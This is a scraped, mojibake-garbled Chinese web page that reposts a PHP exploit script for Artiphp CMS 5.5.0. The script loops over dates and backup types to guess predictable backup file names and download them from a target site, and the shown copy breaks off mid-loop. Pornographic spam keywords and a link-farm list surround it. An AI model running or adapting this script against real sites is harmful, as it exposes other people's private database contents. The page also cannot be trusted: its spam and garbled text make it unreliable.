男人吃奶摸下挵进去好爽,日日躁夜夜躁狠狠躁,freesexvide0s性欧美高清,高清freexxxx性国产,无码人妻一区二区三区一,乱人伦中文字幕成人网站在线,亚洲欧美综合一区二区三区 ,神马影院在线视频观看
知識學(xué)堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時手機:13896886023
  • ·QQ 咨 詢:361652718 513960520
當(dāng)前位置 > 首頁 > 知識學(xué)堂 > 常見技術(shù)問題
Artiphp CMS 5.5.0數(shù)據(jù)庫備份泄露Exploit
更新時間:2012-05-20 | 發(fā)布人:本站 | 點擊率:463

 <?php

 
/*
 
Artiphp CMS 5.5.0 Database Backup Disclosure Exploit
 
 
作者: Artiphp www.2cto.com http://www.artiphp.com
影響版本: 5.5.0 Neo (r422)
 
Summary: Artiphp is a content management system (CMS) open
and free to create and manage your website.
 
描述: Artiphp stores database backups using backupDB() utility
with a predictable file name inside the web root, which can be
exploited to disclose sensitive information by downloading the
file. The backup is located in '/artzone/artpublic/database/'
directory as 'db_backup_[type].[yyyy-mm-dd].sql.gz' filename.
 
測試平臺: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.21
           PHP 5.3.8 / 5.3.9
           MySQL 5.5.20
 
 
Gjoko 'LiquidWorm' Krstic @zeroscience發(fā)現(xiàn)的本漏洞
 
 
 
*/
 
error_reporting(0);
 
print "\no==========================================================o\n";
print "|                                                          |";
print "\n|\tArtiphp CMS 5.5.0 DB Backup Disclosure Exploit     |\n";
print "|                                                          |\n";
print "|\t\t\tby LiquidWorm                      |\n";
print "|                                                          |";
print "\no==========================================================o\n";
 
if ($argc < 3)
{
    print "\n\n\x20[*] Usage: php $argv[0] <host> <port>\n\n\n";
    die();
}
 
$godina_array = array('2012','2011','2010');
 
$mesec_array = array('12','11','10','09',
             '08','07','06','05',
             '04','03','02','01');
 
$dn_array = array('31','30','29','28','27','26',
          '25','24','23','22','21','20',
          '19','18','17','16','15','14',
          '13','12','11','10','09','08',
          '07','06','05','04','03','02',
          '01');
 
$backup_array = array('full','structure','partial');
 
$host = $argv[1];
$port = intval($argv[2]);
$path = "/artiphp/artzone/artpublic/database/"; // www.2cto.com change per need.
 
$alert1 = "\033[0;31m";
$alert2 = "\033[0;37m";
 
foreach($godina_array as $godina)
{
    print "\n\n\x20[*] Checking year: ".$godina."\n\n Scanning: ";
    sleep(2);
    foreach($mesec_array as $mesec)
    {
        foreach($dn_array as $dn)
        {
            print "~";
            foreach($backup_array as $backup)
            {
                if(file_get_contents("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz"))
                {
                    print "\n\n\x20[!] DB backup file discovered!\n\n";
                    echo $alert1;
                    print "\x20==>\x20";
                    echo $alert2;
分享到: QQ空間 新浪微博 開心網(wǎng) 人人網(wǎng)
相關(guān)文章
主站蜘蛛池模板: 丰满熟妇videosxxxxx| 丝瓜视频在线观看免费| 婷婷丁香社区| 日韩伦理片| 精产国品一二三产区别手机| 欧美性暴力变态xxxx| 欧美牲交40_50a欧美牲交aⅴ | av无码久久久久不卡蜜桃| 成全动漫在线观看免费高清| 久久久久国产精品免费免费搜索| japanesevideos中国少妇| а√天堂中文官网在线8| 亚洲乱码精品久久久久..| 最近免费中文字幕大全高清大全10| 午夜理论片yy6080私人影院| mm131美女图片尤物写真丝袜| 一本久道久久综合久久爱| 日本少妇特殊按摩2| 天天狠天天透天天伊人| 久久精品国产亚洲av无码偷窥| 国内精品人妻无码久久久影院| 爱啪啪av网| 少妇被粗大的猛烈进出小说网| 国产欧美日韩精品丝袜高跟鞋| 亚洲av成人精品一区二区三区| 久久久久久久久无码精品亚洲日韩| 亚洲+欧美+视频| 翘臀后进少妇大白嫩屁股| 亚洲av综合永久无码精品天堂| 欧美国产成人精品一区二区三区 | 吃瓜爆料就看黑料社区 | 免费人成视频x8x8入口| 性欧美video高清| 性欧美video高清| 星空影院电影在线看| 好男人在线社区www在线播放| 亚洲欧美成人久久综合中文网| 国产精品视频露脸| 人人妻久久人人澡人人爽人人精品| 亚洲av无码专区亚洲av伊甸园| 你好世界在线观看|